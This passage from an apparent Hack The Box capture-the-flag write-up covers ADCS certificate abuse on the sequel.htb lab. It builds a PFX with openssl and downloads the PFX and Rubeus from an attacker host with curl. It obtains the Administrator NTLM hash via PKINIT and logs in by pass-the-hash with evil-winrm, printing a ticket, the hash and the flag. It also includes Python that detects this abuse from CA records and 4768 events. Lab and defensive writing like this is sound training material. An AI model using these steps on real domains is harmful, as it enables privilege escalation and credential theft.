After obtaining the RSA private key and the certificate in two separate files, cert.pem and private.key, we build a PFX with openssl.

┌──(root㉿kali)-[/home/lovebird]
└─# nano cert.pem

┌──(root㉿kali)-[/home/lovebird]
└─# ls
cert.pem HTBbird.ovpn

┌──(root㉿kali)-[/home/lovebird]
└─# openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Enter Export Password:
Verifying - Enter Export Password:
Verify failure
Can't read Password
4047E3B9797F0000:error:1400006B:UI routines:UI_process:processing error:../crypto/ui/ui_lib.c:544:while reading strings

┌──(root㉿kali)-[/home/lovebird]
└─# openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Enter Export Password:
Verifying - Enter Export Password:

┌──(root㉿kali)-[/home/lovebird]
└─# ls
cert.pem cert.pfx

After creating cert.pfx we transfer the PFX file and Rubeus to the target; Rubeus will help us obtain the administrator's NTLM hash.

*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> curl 10.10.16.9:8000/cert.pfx -o cert.pfx
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> curl 10.10.16.9/Rubeus.exe -o Rubeuss.exe

We request a TGT (Ticket Granting Ticket) with Rubeus and the PFX file in order to obtain the NTLM hash of the Administrator user.

*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> .\Rubeuss.exe asktgt /user:Administrator /password:password /certificate:cert.pfx /getcredentials

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.0

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] Building AS-REQ (w/ PKINIT preauth) for: 'sequel.htb\Administrator'
[*] Using domain controller: fe80::bcdc:f032:f8e4:1054%4:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

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

ServiceName : krbtgt/sequel.htb
ServiceRealm : SEQUEL.HTB
UserName : Administrator
UserRealm : SEQUEL.HTB
StartTime : 5/9/2023 8:00:35 AM
EndTime : 5/9/2023 6:00:35 PM
RenewTill : 5/16/2023 8:00:35 AM
Flags : name_canonicalize, pre_authent, initial, renewable
KeyType : rc4_hmac
Base64(key) : 8OwdlbhQ/yHyrNCoiNpWRg==
ASREP (key) : 6B8E22760494930D27FC5686D231B4AA

[*] Getting credentials using U2U

CredentialInfo :
Version : 0
EncryptionType : rc4_hmac
CredentialData :
CredentialCount : 1
NTLM : A52F78E4C751E5F5E17E1E9F3E58F4EE
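
The certificate request above has Subject CN=Ryan.Cooper but AltName Administrator, and the Rubeus step then uses that certificate to obtain a TGT for Administrator. Both steps leave records a defender can correlate: the CA database row (requester, template, serial, SAN) and Security event 4768, which names the certificate issuer and serial when PKINIT was used. The Python below is an added example, not from the write-up, that does that correlation over constructed records: the first CA row mirrors request ID 10 above, while the serials, client addresses and the other rows are invented, and the two dataclasses are simplified models of the real fields.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class IssuedCert:
    """One issued-certificate row as a CA-database export gives it (request ID, requester,
    template, serial); the SAN UPN is parsed out of the certificate itself. Assumed model."""
    request_id: int
    requester: str           # e.g. "sequel\\Ryan.Cooper"
    template: str
    serial: str
    san_upn: Optional[str]   # UPN from the subjectAltName otherName, if any


@dataclass(frozen=True)
class TgtRequestEvent:
    """Simplified Security event 4768 (Kerberos TGT requested). With PKINIT pre-authentication
    the event's Certificate Information names the issuer and serial; with a password it is empty."""
    account_name: str
    client_address: str
    cert_issuer: Optional[str]
    cert_serial: Optional[str]


def _sam(name: str) -> str:
    """Normalize 'DOMAIN\\user', 'user@domain' and bare 'user' to lower-case 'user'."""
    return name.rsplit("\\", 1)[-1].split("@", 1)[0].lower()


def audit_issuance(certs, logon_templates, privileged_accounts) -> list:
    """Flag logon certificates whose SAN names someone other than the requester, which is
    exactly what the request above produced: requester Ryan.Cooper, SAN Administrator."""
    templates = {t.lower() for t in logon_templates}
    privileged = {_sam(p) for p in privileged_accounts}
    findings = []
    for c in certs:
        if c.template.lower() not in templates or not c.san_upn:
            continue
        if _sam(c.san_upn) != _sam(c.requester):
            findings.append({
                "kind": "san_requester_mismatch",
                "request_id": c.request_id,
                "requester": c.requester,
                "san_upn": c.san_upn,
                "severity": "high" if _sam(c.san_upn) in privileged else "medium",
            })
    return findings


def audit_pkinit_logons(certs, events) -> list:
    """Join 4768 events to CA rows on the certificate serial and flag a TGT obtained for an
    account that is not the one that requested the certificate."""
    by_serial = {c.serial.lower(): c for c in certs}
    findings = []
    for e in events:
        if not e.cert_serial:
            continue  # password pre-authentication: nothing to correlate
        cert = by_serial.get(e.cert_serial.lower())
        if cert is None:
            findings.append({"kind": "certificate_not_in_ca_db", "account": e.account_name,
                             "serial": e.cert_serial, "client": e.client_address})
        elif _sam(e.account_name) != _sam(cert.requester):
            findings.append({"kind": "pkinit_with_another_users_certificate",
                             "account": e.account_name, "requester": cert.requester,
                             "request_id": cert.request_id, "client": e.client_address})
    return findings


# Constructed data: row 10 mirrors the Certify request above (serial made up); the rest are invented.
CA_RECORDS = [
    IssuedCert(10, "sequel\\Ryan.Cooper", "UserAuthentication", "1e0000000a", "Administrator"),
    IssuedCert(11, "sequel\\Ryan.Cooper", "UserAuthentication", "1e0000000b", "Ryan.Cooper@sequel.htb"),
    IssuedCert(12, "sequel\\DC$", "WebServer", "1e0000000c", None),
]
TGT_EVENTS = [
    TgtRequestEvent("Administrator", "10.10.11.202", "sequel-DC-CA", "1e0000000a"),
    TgtRequestEvent("ryan.cooper", "10.10.11.202", "sequel-DC-CA", "1e0000000b"),
    TgtRequestEvent("sql_svc", "10.10.11.202", None, None),
]

if __name__ == "__main__":
    for f in audit_issuance(CA_RECORDS, {"UserAuthentication"}, {"Administrator"}):
        print(f)
    for f in audit_pkinit_logons(CA_RECORDS, TGT_EVENTS):
        print(f)
```

The first audit fires at issuance time, before the certificate is ever used, and is the one to wire into the CA's own logging; the second catches the actual misuse, and a hit on it for a privileged account is a revoke-and-reset incident, not a ticket.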

With the Administrator's NTLM hash we run evil-winrm using the hash and obtain the root.txt flag.

┌──(root㉿kali)-[/home/lovebird]
└─# evil-winrm -i 10.10.11.202 -u Administrator -H A52F78E4C751E5F5E17E1E9F3E58F4EE

*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir


Directory: C:\Users\Administrator\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 5/9/2023 7:18 AM 34 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
ac1ae6882fe57ac0cd04ad22012b5115
*Evil-WinRM* PS C:\Users\Administrator\Desktop>

Many thanks to everyone who read this article; I hope it was useful.
